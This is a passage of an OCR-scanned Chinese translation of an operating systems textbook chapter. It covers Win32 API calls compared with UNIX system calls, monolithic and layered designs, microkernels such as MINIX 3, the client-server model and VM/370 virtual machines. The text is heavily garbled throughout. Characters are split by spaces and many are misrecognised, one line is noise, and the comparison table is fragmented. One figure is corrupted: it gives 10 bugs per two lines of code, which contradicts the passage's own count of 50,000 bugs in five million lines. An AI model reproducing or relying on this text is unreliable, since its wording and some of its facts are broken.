包括 做 各 种 处 理 的 代码 以 及 从 事 完成 特定 服务 的 系统 调用 。 相 反 ， 一 个 
Windows 程 序 通常 是 一 个 事件 驱动 程序 。 其 中 主 程序 等 待 某 些 事 件 发 
生 ， 然 后 调用 一 个 过 程 处 理 该 事件 。 典 型 的 事件 包括 被 敲 击 的 键 、 移 动 
的 鼠标 、 被 按 下 的 鼠标 或 插入 的 CD-ROM。 调 用 事件 处 理 程序 处 理事 
件 ， 刷 新 屏幕 ， 并 更 新 内 部 程序 状态 。 总 之 ， 这 是 与 UNIX 不 同 的 程序 
设计 风格 ， 由 于 本 书 专注 于 操作 系统 的 功能 和 结构 ， 这 些 程序 设计 方式 
上 的 差异 就 不 过 多 涉及 了 。 











当然 ， 在 Windows 中 也 有 系统 调用 。 在 UNIX 中 ， 系 统 调用 (如 
read) 和 系统 调用 所 使 用 的 库 过 程 ( 如 read) 之 间 几 乎 是 一 一 对 应 的 关 
系 。 换 句 话 说 ， 对 于 每 个 系统 调用 ， 差 不 多 就 涉及 一 个 被 调用 的 库 过 
程 ， 如 图 1-17 所 示 。 此 外 ，POSIX 有 约 100 个 过 程 调用 。 


在 windows 中 ， 情 况 就 大 不 相同 了 。 首 先 ， 库 调用 和 实际 的 系统 调 
用 是 几乎 不 对 应 的 。 微 软 定义 了 一 套 过 程 ， 称 为 应 用 编程 接口 
(Application Program Interface, Win32 API) ， 程 序 员 用 这 套 过 程 获 得 
操作 系统 的 服务 。 从 Windows 95 开 始 的 所 有 Windows 版 本 都 (或 部 分 ) 








支持 这 个 接口 。 由 于 接口 与 实际 的 系统 调用 不 对 应 ， 微 软 保留 了 随 着 时 
间 《 甚 至 随 着 版 本 到 版 本 ) 改变 实际 系统 调用 的 能 力 ， 防 止 使 已 有 的 程 
序 失效 。 由 于 Windows 2000、Windows XP 和 Windows Vista 中 有 许多 过 
去 没有 的 新 调用 ， 所 以 究竟 Win32 是 由 什么 构成 的 ， 这 个 问题 的 答案 仍 
然 是 含混 不 清 的 。 在 本 节 中 ，Win32 表 示 所 有 Windows 版 本 都 支持 的 接 
H. 


Win32 API 调 用 的 数量 是 非常 大 的 ， 数 量 有 数 千 个 。 此 外 ， 尽 管 其 
中 许多 确实 涉及 系统 调用 ， 但 有 一 大 批 Win32 API 完 全 是 在 用 户 空 间 进 
行 。 结 果 ， 在 Windows 中 ， 不 可 能 了 解 哪 一 个 是 系统 调用 (如 由 内 核 完 
成 ) ， 哪 一 个 只 是 用 户 空 间 中 的 库 调 用 。 事 实 上 ， 在 某 个 版 本 中 的 一 个 
系统 调用 ， 会 在 另 一 个 不 同 版 本 中 的 用 户 空间 中 执行 ， 或 者 相反 。 当 我 
们 在 本 书 中 讨论 windows 的 系统 调用 时 ， 将 使 用 Win32 过 程 〈 在 合适 之 
Nb) ， 这 是 因为 微软 保证 : 随 着 时 间 流 逝 ，Win32 过 程 将 保持 稳定 。 但 
是 读者 有 必要 记 住 ， 它 们 并 不 全 都 是 系统 调用 《〈 即 陷入 到 内 核 中 ) 。 











Win32 API 中 有 大 量 的 调用 ， 用 来 管理 视窗 、 几 何 图 形 、 文 本 、 字 
型 、 滚 动 条 、 对 话 框 、 荣 单 以 及 GUI 的 其 他 功能 。 为 了 使 图 形 子 系统 在 
内 核 中 运行 〈《 某 些 Windows 版 本 中 确实 是 这 样 ， 但 不 是 所 有 的 版 本 ) ， 
需要 系统 调用 ， 否 则 只 有 库 调 用 。 在 本 书 中 是 否 应 该 讨论 这 些 调用 呢 ? 
由 于 它们 并 不 是 同 操作 系统 的 功能 相关 ， 我 们 还 是 决定 不 讨论 它们 ， 尽 
管 它们 会 在 内 核 中 运行 。 对 Win32 API 有 兴趣 的 读者 应 该 参阅 一 些 书 籍 











中 的 有 关内 容 ，【( 例 如 ，Hart，1997; Rector 和 Newcomer，1997; 
Simon, 1997) 。 


我 们 在 这 里 介绍 所 有 的 Win32 API， 不 过 这 不 是 我 们 关心 问题 的 所 
在 ， 所 以 我 们 做 了 一 些 限 制 ， 只 将 那些 与 图 1-18 中 UNIX 系 统 调用 大 致 
对 应 的 Windows 调 用 列 在 图 1-23 中 。 


fork CreateProcess 
‘waitpid | WaitForSingleObject| "S — hii EAU 
(none) CreateProcess = fork + execve 
| exit | ExitProcess 终止 执行 
open | CreateFile | 创建 一 个 文件 或 打开 一 个 已 有 的 文件 
关闭 一 个 文件 


ReadFile 从 一 个 文件 读数 据 
GetFileAttributesEx 









说 H 










创建 一 个 新 进程 































































移动 文件 指针 
取得 文件 的 属性 

创建 一 个 新 目录 

rmdir 删除 一 个 空 目录 
unlink 毁 掉 一 个 已 有 的 文件 
(none) Win32 不 文 持 mount 
umount | (none) Win32 不 支持 umount 
改变 当前 工作 目录 
Win32 不 支持 安全 性 (但 NT 支持 ) 
Win32 不 支持 信号 


GetLocalTime 获得 当前 时 间 


图 1-23 与 图 1-18 中 UNIX 调 用 大 致 对 应 的 Win32 API 调 用 





































































下 面 简要 地 说 明 一 下 图 1-23 中 表格 的 内 容 。CreateProcess 为 创建 一 
个 新 进程 ， 它 把 UNIX 中 的 fork 和 execve 结 合 起 来 。 它 有 许多 参数 用 来 指 
定 新 创建 进程 的 性 质 。Windows 中 没有 类 似 UNIX 中 的 进程 层次 ， 所 以 
不 存在 父 进程 和 子 进程 的 概念 。 在 进程 创建 之 后 ， 创 建 者 和 被 创建 者 是 
平等 的 。WaitForSingleObject 用 于 等 待 一 个 事件 ， 等 待 的 事件 可 以 是 多 
种 可 能 的 事件 。 如 果 有 参数 指定 了 某 个 进程 ， 那 么 调用 者 等 待 所 指定 的 


进程 退出 ， 这 通过 使 用 ExitProcess 完 成 。 








接着 的 六 个 调用 进行 文件 操作 ， 在 功能 上 和 它们 的 UNIX 对 应 调用 
类 似 ， 尽 管 在 参数 和 细节 上 它们 都 是 不 同 的 。 和 在 UNIX 中 一 样 ， 文 件 
可 被 打开 、 关 闭 和 写 入 。SetFilePointer 以 及 GetFileAttributesEx 调 用 设置 
文件 的 位 置 并 取得 文件 的 一 些 属性 。 








Windows 中 有 目录 ， 目 录 可 以 分 别 用 CreateDirectory 以 及 
RemoveDirectory API 调 用 创建 和 删 去 。 也 有 对 当前 目录 的 标记 ， 这 可 以 
通过 SetCurrentDirectory 来 设置 。 使 用 GetLocalTime 可 获得 当前 时 间 。 








Win32 接 口中 没有 文件 的 链接 、 文 件 系统 的 安装 、 安 全 属性 或 信 
号 ， 所 以 对 应 于 UNIX 中 的 这 些 调用 就 不 存在 了 。 当 然 ，Win32 中 也 有 
大 量 的 在 UNIX 中 不 存在 的 其 他 调用 ， 特 别 是 管理 GUI 的 种 种 调用 。 不 
过 在 Windows Vista 中 有 了 精心 设计 的 安全 系统 ， 而 且 也 文 持 文 件 的 链 
接 。 


也 许 有 必要 对 Win32 做 一 个 最 后 的 说 明 。Win32 并 不 是 非常 统一 的 
或 有 一 致 的 接口 。 其 主要 原因 是 由 于 Win32 需 要 与 早期 的 在 Windows 3.x 
中 使 用 的 16 位 接口 向 后 兼容 。 








1.7 操作 系统 结构 


我 们 已 经 分 析 了 操作 系统 的 外 部 〈 如 ， 程 序 员 接 口 ) ， 现 在 是 分 析 
其 内 部 的 时 候 了 。 在 下 面 的 小 节 中 ， 为 了 对 各 种 可 能 的 方式 有 所 了 解 ， 
我 们 将 考察 已 经 尝试 过 的 六 种 不 同 的 结构 设计 。 这 样 做 并 没有 穷尽 各 种 
结构 方式 ， 但 是 至 少 给 出 了 在 实践 中 已经 试验 过 的 一 些 设计 思想 。 这 六 
种 设计 是 ， 单 体系 统 、 层 次 系统 、 微 内 核 、 客 户 机 -服务 器 系统 、 虚 拟 


机 和 exokernels 等 。 





1.7.1 单 体系 统 


到 目前 为 止 ， 在 多 数 第 见 的 组 织 形式 的 处 理 方式 中 ， 全 部 操作 系统 
在 内 核 态 中 以 单一 程序 的 方式 运行 。 整 个 操作 系统 以 过 程 集合 的 方式 编 
写 ， 链 接 成 一 个 大 型 可 执行 二 进 制 程序 。 使 用 这 种 技术 ， 系 统 中 每 个 过 
程 可 以 自由 调用 其 他 过 程 ， 只 要 后 者 提供 了 前 者 所 需要 的 一 些 有 用 的 计 
算 工作 。 这 些 可 以 不 受 限制 彼此 调用 的 成 干 个 过 程 ， 常 常 导 致 出 现 一 个 
笨拙 和 难于 理解 的 系统 。 





在 使 用 这 种 处 理 方式 构造 实际 的 目标 程序 时 ， 首 先 编译 所 有 单个 的 
过 程 ， 或 者 编译 包含 过 程 的 文件 ， 然 后 通过 系统 链接 程序 将 它们 链接 成 
单一 的 目标 文件 。 依 靠 对 信息 的 隐藏 处 理 ， 不 过 在 这 里 实际 上 是 不 存在 




















的 ， 每 个 过 程 对 其 他 过 程 都 是 可 见 的 《相反 的 构造 中 有 模块 或 包 ， 其 中 
多 数 信息 隐藏 在 模块 之 中 ， 而 且 只 能 通过 正式 设计 的 入 口 点 实现 模块 的 
外 部 调用 ) 。 





但 是 ， 即 使 在 单 体系 统 中 ， 也 可 能 有 一 些 结构 存在 。 可 以 将 参数 放 
置 在 展 好 定义 的 位 置 《 如 ， 栈 ) ， 通 过 这 种 方式 ， 向 操作 系统 请 求 所 能 
提供 的 服务 系统 调用 ) ， 然 后 执行 一 个 陷阱 指令 。 这 个 指令 将 机 器 从 
用 户 态 切换 到 内 核 态 并 把 控制 传递 给 操作 系统 ， 如 图 1-17 中 第 6 步 所 
示 。 然 后 ， 操 作 系 统 取 出 参数 并 且 确 定 应 该 执行 哪 一 个 系统 调用 。 随 
后 ， 它 在 一 个 表格 中 检索 ， 在 该 表格 的 k 权 中 存放 大 指 回执 行 系统 调用 k 
过 程 的 指针 (图 1-17 中 第 7 步 〉。 








对 于 这 类 操作 系统 的 基本 结构 ， 有 着 如 下 结构 上 的 建议 : 
1) 需 要 一 个 主 程序 ， 用 来 处 理 服务 过 程 请 求 。 
2) 需 要 一 套 服务 过 程 ， 用 来 执行 系统 调用 。 


3) 需 要 一 套 实用 过 程 ， 用 来 辅助 服务 过 程 。 在 该 模型 中 ， 每 一 个 系 
统 调用 都 通过 一 个 服务 过 程 为 其 工作 并 运行 之 。 要 有 一 组 实用 程序 来 完 
成 一 些 服务 过 程 押 需 要 用 到 的 功能 ， 如 从 用 户 程序 取 数 据 等 。 可 将 各 种 
过 程 划 分 为 一 个 三 层 的 模型 ， 如 图 1-24 所 示 。 





图 1-24 简单 的 单 体系 统 结构 模型 


除了 在 计算 机 初 启 时 所 装载 的 核心 操作 系统 外 ， 许 多 操作 系统 文 持 
可 装载 的 扩展 ， 诸 如 LO 设备 驱动 和 文件 系统 。 这 些 部 件 可 以 按照 需要 
载 入 。 


1.7.2 ”层次 式 系统 


把 图 1-24 中 的 系统 进一步 通用 化 ， 就 变 成 一 个 层次 式 结构 的 操作 系 
统 ， 它 的 上 层 软件 都 是 在 下 一 层 软件 的 基础 之 上 构建 的 。E.W.Dijkstra 
和 他 的 学 生 在 荷兰 的 Eindhoven 技 术 学 院 所 开发 的 THE 系 统 〈《1968) ， 
是 按 此 模型 构造 的 第 一 个 操作 系统 。THE 系 统 是 为 荷兰 的 一 种 计算 机 ， 
Electrologica X8， 配 备 的 一 个 简单 的 批 处 理 系统 ， 其 内 存 只 有 32K 个 
字 ， 每 字 27 位 〈 二 进 制 位 在 那 时 是 很 昂贵 的 ) 。 


该 系统 共 分 为 六 层 ， 如 图 1-25 所 示 。 处 理 器 分 配 在 第 0 层 中 进行 ， 
当中 断 发 生 或 定时 器 到 期 时 ， 由 该 层 进行 进程 切换 。 在 第 0 层 之 上 ， 系 
统 由 一 些 连续 的 进程 所 组 成 ， 编 写 这 些 进 程 时 不 用 再 考虑 在 单 处 理 器 上 
多 进程 运行 的 细节 。 也 就 是 说 ， 在 第 0 层 中 提供 了 基本 的 CPU 多 道 程序 














用 户 程 序 
得 入 /得 出 党 理 
操作 员 - 进程 通信 


存储 器 和 磁 鼓 管理 
处 理 器 分 配 和 多 道 程 序 设计 





图 1-25 THE 操作 系统 的 结构 


内 存 管理 在 第 1 层 中 进行 ， 它 分 配 进程 的 主 存 空间 ， 当 内 存 用 完 时 
则 在 一 个 512K 字 的 磁 或 上 保留 进程 的 一 部 分 (页 面 )。 在 第 1 层 上 ， 进 
程 不 用 考虑 它 是 在 磁 或 上 还 是 在 内 存 中 运行 。 第 1 层 软 件 保 证 一 旦 需要 
访问 某 一 页 面 时 ， 该 页 面 必定 已 在 内 存 中 。 





第 2 层 处 理 进程 与 操作 员 控 制 台 〔 即 用 户 ) 之 间 的 通信 。 在 这 层 的 
上 部 ， 可 以 认为 每 个 进程 都 有 自己 的 操作 员 控 制 台 。 第 3 层 省 理 1/O 设 备 
和 相关 的 信息 流 缓 冲 区 。 在 第 3 层 上 ， 每 个 进程 都 与 有 展 好 特性 的 抽象 
IO 设备 打交道 ， 而 不 必 考 碟 外 部 设备 的 物理 细节 。 第 4 层 是 用 户 程序 
层 。 用 户 程序 不 用 考虑 进程 、 内 存 、 控 制 台 或 IO 设备 管理 等 细节 。 系 
统 操 作 员 进程 位 于 第 5 层 中 。 








在 MULTICS 系 统 中 采用 了 更 进一步 的 通用 层次 化 概念 。MULTICS 
由 许多 的 同心 环 构造 而 成 ， 而 不 是 采用 层次 化 构造 ， 内 层 环比 外 层 环 有 
更 高 的 级 别 ( 它 们 实际 上 是 一 样 的 ) 。 当 外 环 的 过 程 欲 调用 内 环 的 过 程 
时 ， 它 必须 执行 一 条 等 价 于 系统 调用 的 TRAP 指 令 。 在 执行 该 TRAP 指 令 
前 ， 要 进行 严格 的 参数 合法 性 检查 。 在 MULTICS 中 ， 尽 管 整个 操作 系 
统 是 各 个 用 户 进程 的 地 址 空间 的 一 部 分 ， 但 是 硬件 仍 能 对 单个 过 程 〈 实 
际 是 内 存 中 的 一 个 段 ) 的 读 、 写 和 执行 进行 保护 。 





实际 上 ，THE 分 层 方案 只 是 为 设计 提供 了 一 些 方便 ， 因 为 该 系统 的 





各 个 部 分 最 终 仍 然 被 链接 成 了 完整 的 单个 目标 程序 。 而 在 MULTICS 

里 ， 环 形 机 制 在 运行 中 是 实际 存在 的 ， 而 且 是 由 硬件 实现 的 。 环 形 机 制 
的 一 个 优点 是 很 容易 扩展 ， 可 用 以 构造 用 户 子 系统 。 例 如 ， 在 一 个 
MULTICS 系 统 中 ， 教 授 可 以 写 一 个 程序 检查 学 生 们 编写 的 程序 并 给 他 
们 打分 ， 在 第 n 个 环 中 运行 教授 的 程序 ， 而 在 第 n+1 个 环 中 运行 学 生 的 程 
序 ， 这 样 学 生 们 就 无 法 算 改 教授 所 给 出 的 成 绩 。 

















1.7.3 GA 





在 分 层 方式 中 ， 设 计 者 要 确定 在 哪里 划分 内 核 - 用 户 的 边界 。 在 传 
统 上 ， 所 有 的 层 都 在 内 核 中 ， 但 是 这 样 做 没有 必要 。 事 实 上 ， 尽 可 能 减 
少 内 核 态 中 功能 的 做 法 更 好 ， 因 为 内 核 中 的 错误 会 快速 拖累 系统 。 相 
反 ， 可 以 把 用 户 进程 设置 为 具有 较 小 的 权限 ， 这 样 ， 某 一 个 错误 的 后 果 
就 不 会 是 致命 的 。 








有 不 少 研究 人 员 对 每 千 行 代码 中 错误 的 数量 进行 了 分 析 《〈 例 如 ， 
Basilli 和 Perricone，1984; Ostrand 和 Weyuker，2002) 。 代 码 错误 的 密 
度 取决 于 模块 大 小 、 模 块 寿 命 等 ， 不 过 对 一 个 实际 工业 系统 而 言 ， 每 二 
行 代 码 中 会 有 10 个 错误 。 这 意味 着 在 有 5 百 万 行 代码 的 单 体操 作 系 统 
中 ， 大 约 有 50 000 个 内 核 错 误 。 当 然 ， 并 不 是 所 有 的 错误 都 是 致命 的 ， 
诸如 给 出 了 不 正确 的 故障 信息 之 类 的 某 些 错误 ， 实 际 是 很 少 发 生 的 。 无 
论 怎 样 看 ， 操 作 系统 中 充满 了 错误 ， 所 以 计算 机 制造 商 设置 了 复位 按钮 
(通常 在 前 面板 上 ) ， 而 电视 机 、 立 体 音响 以 及 汽车 的 制造 商 们 则 不 这 
样 做 ， 尽 管 在 这 些 装 置 中 也 有 大 量 的 软件 。 








在 微 内 核 设 计 背 后 的 思想 是 ， 为 了 实现 高 可 靠 性 ， 将 操作 系统 划分 
成 小 的 、 民 好 定义 的 模块 ， 只 有 其 中 一 个 模块 一 一 微 内 核 一 一 运行 在 内 
核 态 上 ， 其 余 的 模块 ， 由 于 功能 相对 弱 些 ， 则 作为 普通 用 户 进 程 运行 。 





特别 地 ， 由 于 把 每 个 设备 驱动 和 文件 系统 分 别 作为 普通 用 户 进程 ， 这 些 
模块 中 的 错误 虽然 会 使 这 些 模块 衣 泪 ， 但 是 不 会 使 得 整个 系统 死机 。 所 
以 ， 在 音频 驱动 中 的 错误 会 使 声音 断 续 或 停 上 上， 但 是 不 会 使 整个 计算 机 
垮 反 。 相 反 ， 在 单 体系 统 中 ， 由 于 所 有 的 设备 驱动 都 在 内 核 中 ， 一 个 有 
故障 的 音频 驱动 会 很 容易 引起 对 无 效 地 址 的 引用 ， 从 而 造成 恼人 的 系统 
立即 停机 。 











有 许多 微 内 核 已 经 实现 并 投入 应 用 (Accetta 等 人 ，1986; Kirsch% 
人 ，2005; Heiser 等 人 ，2006; Herder 等 人 ，2006; Hildebrand, 1992; 
Haertig 等 人 ，1997; Liedtke, 1993, 1995, 1996; Pike 等 人 ，1992; 
Zuberi 等 人 ，1999) 。 微 内 核 在 实时 、 工 业 、 航 空 以 及 军事 应 用 中 特别 
流行 ， 这 些 领 域 都 是 关键 任务 ， 需 要 有 高 度 的 可 靠 性 。 知 名 的 微 内 核 有 
Integrity、K42、L4、PikeOS、QNX、Symbian， 以 及 MINIX 3 等 。 这 里 
对 MINIX 3 做 一 简单 的 介绍 ， 该 操作 系统 把 模块 化 的 思想 推 到 了 极致 ， 
它 将 大 部 分 操作 系统 分 解 成 许多 独立 的 用 户 态 进程 。MINIX 3 遵守 
POSIX， 可 在 www.minix3.org (Herder 等 人 ，2006a; Herder A, 
2006b〉 站 点 获得 人 免费 的 开放 源 代码 。 








MINIX 3 微 内 核 只 有 3200 行 C 语 言 代码 和 800 行 用 于 非常 低层 次 功能 
的 汇编 语言 代码 ， 诸 如 捕捉 中 断 、 进 程 切换 等 。C 代 码 管理 和 调度 进 
程 、 处 理 进 程 间 通信 《在 进程 之 间 传 送信 息 ) 、 提 供 大 约 35 个 内 核 调 
用 ， 它 们 使 得 操作 系统 的 其 余部 分 可 以 完成 其 工作 。 这 些 调用 完成 诸如 





连接 中 断 句柄 、 在 地 址 空间 中 移动 数据 以 及 为 新 创建 的 进程 安装 新 的 内 
存 映像 等 。MINIX 3 的 进程 结构 如 图 1-26 所 示 ， 其 中 内 核 调用 的 句柄 用 


Sys 标 记 。 时 钟 设 备 驱 动 也 在 内 核 中 ， 因 为 这 个 驱动 与 调度 器 交互 密 


切 。 所 有 的 其 他 设备 驱动 都 作为 单独 的 用 户 进程 ; 
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1-26 MINIX 3 系统 的 结构 


”进程 间 通 信 CPC) 





图 


在 内 核 的 外 部 ， 系 统 的 构造 有 三 层 进程 ， 它 们 都 在 用 户 态 中 运行 。 
最 底层 中 包含 设备 驱动 器 。 由 于 它们 在 用 户 态 中 运行 ， 所 以 不 能 物理 地 
访问 IO 端口 空间 ， 也 不 能 直接 发 出 IO 命令 。 相 反 ， 为 了 能 够 对 MO 设备 
编程 ， 驱 动 器 构建 了 一 个 结构 ， 指 明 哪 个 参数 值 写 到 哪个 VO 端口 ， 并 
生成 一 个 内 核 调用 ， 通 知 内 核 完成 写 操 作 。 这 个 处 理 意味 着 内 核 可 以 检 
查 驱 动 正在 对 LO 的 读 (或 写 ) 是 否 是 得 到 授权 使 用 的 。 这 样 ，〔 与 单 
体 设 计 不 同 ) ， 一 个 有 错误 的 音频 驱动 器 就 不 能 够 偶发 性 地 在 硬盘 上 进 
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行 写 操作 。 








在 驱动 器 上 面 是 另 一 用 户 态 层 ， 包 含有 服务 器 ， 它 们 完成 操作 系统 
多 数 的 工作 。 有 一 个 或 多 个 文件 服务 器 管理 着 文件 系统 ， 进 程 管 理 器 创 
建 、 破 坏 和 管理 进程 等 。 通 过 给 服务 占 发 送 短 消 恩 请 求 POSIX 系 统 调用 
的 方式 ， 用 户 程序 获得 操作 系统 的 服务 。 例 如 ， 一 个 需要 调用 read 的 进 
程 发 送 一 个 消息 给 东 个 文件 服务 器 ， 告 知 它 需 要 读 什 么 内 容 。 





有 一 个 有 趣 的 服务 器 ， 称 为 再 生 服 务 器 (reincarnation server) ， 其 
任务 是 检查 其 他 服务 器 和 驱动 右 的 功能 是 人 否 正确 。 一 旦 检查 出 一 个 错 
误 ， 它 自动 取代 之 ， 无 须 任何 用 户 的 干预 。 这 种 方式 使 得 系统 具有 上 自修 
复 能 力 ， 并 且 获 得 了 较 高 的 可 靠 性 。 

















系统 对 每 个 进程 的 权限 有 着 许多 限制 。 正 如 已 经 提 及 的 ， 设 备 驱动 
需 只 能 与 授权 的 IO 端口 接触 ， 对 内 核 调用 的 访问 也 是 按 单 个 进程 进行 
控制 的 ， 这 是 考 碟 到 进程 具有 回 其 他 多 个 进程 发 送 消 妃 的 能 力 。 进 程 也 
可 获得 有 限 的 许可 ， 让 在 内 核 的 其 他 进程 访问 其 地 址 空间 。 例 如 ， 一 个 
文件 系统 可 以 为 磁盘 驱动 器 获得 一 种 允许 ， 让 内 核 在 该 文件 系统 的 地 址 
空间 内 的 特定 地 址 上 进行 对 盘 块 的 一 个 新 读 操 作 。 总 体 来 说 ， 所 有 这 些 
限制 是 让 每 个 驱动 和 服务 器 只 拥有 完成 其 工作 所 需要 的 权限 ， 别 无 其 
他 ， 这 样 束 极 大 地 限制 了 故障 部 件 可 能 造成 的 危害 。 





一 个 与 小 内 核 相 关联 的 思想 是 在 内 核 中 的 机 制 与 策略 分 离 的 原则 。 


为 了 更 清晰 地 说 明 这 一 点 ， 让 我 们 考虑 进程 调度 。 一 个 比较 简单 的 调度 
算法 是 ， 对 每 个 进程 赋予 一 个 优先 级 ， 并 让 内 核 执 行 在 具有 最 高 优先 级 
进程 中 可 以 运行 的 茶 个 进程 。 这 里 ， 机 制 〈 在 内 核 中 ) 就 是 寻找 最 高 优 
先 级 的 进程 并 运行 之 。 而 策略 《赋予 进程 以 优先 级 ) 可 以 由 用 户 态 中 的 
进程 完成 。 在 这 个 方式 中 ， 机 制 和 策略 是 分 离 的 ， 从 而 使 系统 内 核 变 得 
By. 














1.7.4 客户 机 -服务 圳 模式 


一 个 微 内 核 思 想 的 略微 变 体 是 将 进程 划分 为 两 类 : 服务 器 ， 每 个 服 
务 吉 提供 东 种 服务 ;客户 问 ， 使 用 这 些 服 务 。 这 个 模式 就 是 所 谓 的 客户 
机 -服务 占 模 式 。 通 第 ， 在 系统 最 研 层 是 微 内 核 ， 但 并 不 是 必须 这 样 
的 。 这 个 模式 的 本 质 是 存在 客户 端 进程 和 服务 器 进程 。 








一 般 地 ， 在 客户 端 和 服务 器 之 间 的 通信 和 是 消息 传递 。 为 了 获得 一 个 
服务 ， 客 户 问 进 程 构造 一 段 消息 ， 说 明 所 需要 的 服务 ， 并 将 其 发 给 合适 
的 服务 器 。 该 服务 完成 工作 ， 发 送 回 应 。 如 果 客 户 端 和 服务 器 运行 在 同 
一 个 机 器 上 ， 则 有 可 能 进行 茶 种 优化 ， 但 是 从 概念 上 看 ， 在 这 里 讨论 的 
是 消 恩 传递 。 





这 个 思想 的 一 个 显然 的 、 普 通 方式 是 ， 客 户 端 和 服务 器 运行 在 不 同 
的 计算 机 上 ， 它 们 通过 局 域 或 广域网 连接 ， 如 图 1-27 所 示 。 由 于 客户 端 
通过 发送 消息 与 服务 需 通 信 ， 客 己 问 并 不 需要 知道 这 些 消息 是 在 它们 的 
本 地 机 器 上 处 理 ， 还 是 通过 网 络 被 送 到 远程 机 器 上 处 理 。 对 于 客户 端 而 
言 ， 这 两 种 情形 是 一 样 的 : 都 是 发 送 请 求 并 得 到 回应 。 所 以 ， 客 户 机 - 
服务 器 模式 是 一 种 可 以 应 用 在 单机 或 者 网 络 机 器 上 的 抽象 。 
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消息 从 客户 机 
到 服务 器 


图 1-27 在 网 络 上 的 客户 机 -服务 器 模型 


越 来 越 多 的 系统 ， 包 括 用 户 家 里 的 PC 机 ， 都 成 为 了 客户 端 ， 而 在 
AMIS AT AAA LAS MAMA aso EKE, VE Website WIA PTT E 
运行 的 。 一 台 PC 机 回 茶 个 服务 器 请 求 一 个 web 页面， 而 后 ， 该 Web 页 面 
回 送 。 这 瓯 是 网 络 中 客户 机 -服务 器 的 典型 应 用 方式 。 





1.7.5 ”虚拟 机 


OS/360 的 最 早 版 本 是 纯粹 的 批 处 理 系统 。 然 而 ， 有 许多 360 用 户 希 
望 能 够 在 终端 上 交互 工作 ， 于 是 在 IBM 公 司 内 外 的 一 些 研究 小 组 决定 为 
它 编 写 一 个 分 时 系统 。 在 后 来 推出 了 正式 的 IBM 分 时 系统 ，TSS/360。 
但 是 它 非 常 庞 大 ， 运 行 缓慢 ， 于 是 在 花费 了 约 五 干 万 美元 的 研制 费用 
后 ， 该 系统 最 后 被 弃 之 不 用 (Graham，1970) 。 但 是 在 麻 省 剑桥 的 一 
个 IBM 研 究 中心 开 发 了 另 一 个 完全 不 同 的 系统 ， 这 个 系统 被 IBM 最 终 用 
作为 产品 。 它 的 直接 后 续 ， 称 为 ZVM， 目 前 在 IBM 的 现 有 大 型 机 上 广 
泛 使 用 ，zSeries 则 在 大 型 公司 的 数据 中 心中 广泛 应 用 ， 例 如 ， 作 为 e- 
commerce 服 务 器 ， 它 们 每 秒 可 以 处 理 成 百 上 千 个 事务 ， 并 使 用 达 数 百 万 
G 字 节 的 数据 库 。 








1.VM/370 


这 个 系统 最 初 被 命名 为 CP/CMS， 后 来 改名 为 VYM/370 〈Seawright 和 
MacKinnon, 1979) 。 它 是 源 于 如 下 一 种 机 敏 的 观察 。 分 时 系统 应 该 提 
供 这 些 功能 : (1) 多 道 程序 ，〈2) 一 个 比 裸 机 更 方便 的 、 有 扩展 界面 
的 计算 机 。VM/370 存 在 的 目的 是 将 二 者 彻底 地 隔离 开 来 。 





这 个 系统 的 核心 称 为 虚拟 机 监控 程序 (virtual machine monitor) ， 
它 在 裸 机 上 运行 并 且 具 备 了 多 道 程序 功能 。 该 系统 同上 层 提 供 了 若干 台 








虚拟 机 ， 如 图 1-28 所 示 。 它 不 同 于 其 他 操作 系统 的 地 方 是 : 这 些 虚 拟 机 
不 是 那 种 具有 文件 等 优 恨 特征 的 扩展 计算 机 。 与 之 相反 ， 它 们 仅仅 是 神 
机 硬件 的 精确 复制 品 。 这 个 复制 品 包 含 了 内 核 态 /用 户 态 、IO 功 能 、 中 
断 及 其 他 真实 人 硬件 所 应 该 具有 的 全 部 内 容 。 





虚拟 370 


系统 调用 
IO 指令 陷阱 


陷阱 





图 1-28 配 有 CMS 的 VM/370 结 构 
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由 于 每 台 虚 拟 机 都 与 裸 机 相同 ， 所 以 在 每 台 虚 拟 机 上 都 可 以 运行 一 
台 裸 机 所 能 够 运行 的 任何 类 型 的 操作 系统 。 不 同 的 虚拟 机 可 以 运行 不 同 
的 操作 系统 ， 而 且 实 际 上 往往 就 是 如 此 。 在 早期 的 VMV370 系 统 上 ， 有 
一 些 系统 运行 0S/360 或 其 他 大 型 批 处 理 或 事务 处 理 操作 系统 中 的 某 一 
个 ， 而 另 一 些 虚 拟 机 运行 单 用 户 、 交 互 式 系统 供 分 时 用 户 们 使 用 ， 这 个 
系统 称 为 会 话 监控 系统 (Conversational Monitor System, CMS) 。 后 者 


在 程序 员 中 很 流行 。 








当 一 个 CMS 程序 执行 系统 调用 时 ， 该 调用 被 陷入 到 其 虚拟 机 的 操作 
系统 上 ， 而 不 是 YM/370 上 ， 似 乎 它 运行 在 实际 的 机 器 上 ， 而 不 是 在 虚 


拟 机 上 。CMS 然 后 发 出 普通 的 硬件 IO 指令 读 出 虚拟 磁盘 或 其 他 需要 执 
行 的 调用 。 这 些 WO 指 令 由 VM/370 陶 入 ， 然 后， 作为 对 实际 人 硬件 模拟 的 
一 部 分 ，VMV370 完 成 指令 。 通 过 对 多 道 程序 功能 和 提供 扩展 机 器 二 者 


的 完全 分 离 ， 每 个 部 分 都 变 得 非常 简单 ， 非 第 灵活 且 容 易 维护 。 








虚拟 机 的 现代 化 里 ，z/VM， 通 常用 于 运行 多 个 完整 的 操作 系统 ， 
而 不 是 简化 成 如 CMS 一 样 的 单 用 户 系统 。 例 如 ，zSeries 有 能 力 随 着 传统 
的 BM 操作 系统 一 起 ， 运 行 一 个 或 多 个 Linux 虚 拟 机 。 


2. 虚 拟 机 的 再 次 发 现 


IBM 拥 有 虚拟 机 产品 已 经 有 四 十 年 了 ， 而 有 少数 公司 ， 包 括 Sun 
Microsystems 公 司 和 Hewlett-Packard 等 公司 ， 近 来 也 在 他 们 的 高 端 企业 
服务 器 上 增加 对 虚拟 机 的 支持 ， 在 PC 机 上 ， 直 到 最 近 之 前 ， 虚 拟 化 的 
思想 在 很 大 程度 上 被 忽略 了 。 不 过 近年 来 ， 新 的 需求 ， 新 的 软件 和 新 的 
技术 的 结合 已 经 使 得 虚拟 机 成 为 一 个 热点 。 





首先 看 需求 。 传 统 上 ， 许 多 公司 在 不 同 的 计算 机 上 ， 有 时 还 在 不 同 
的 操作 系统 上 上， 运行 其 邮件 服务 器 、Web 服 务 器 、FTP 服 务 器 以 及 其 他 
服务 器 。 他 们 看 到 虚拟 化 可 以 使 他 们 在 同一 台 机 顺 上 运行 所 有 的 服务 
器 ， 而 不 会 由 于 一 个 服务 器 骨 泪 ， 束 影响 其 余 的 系统 。 





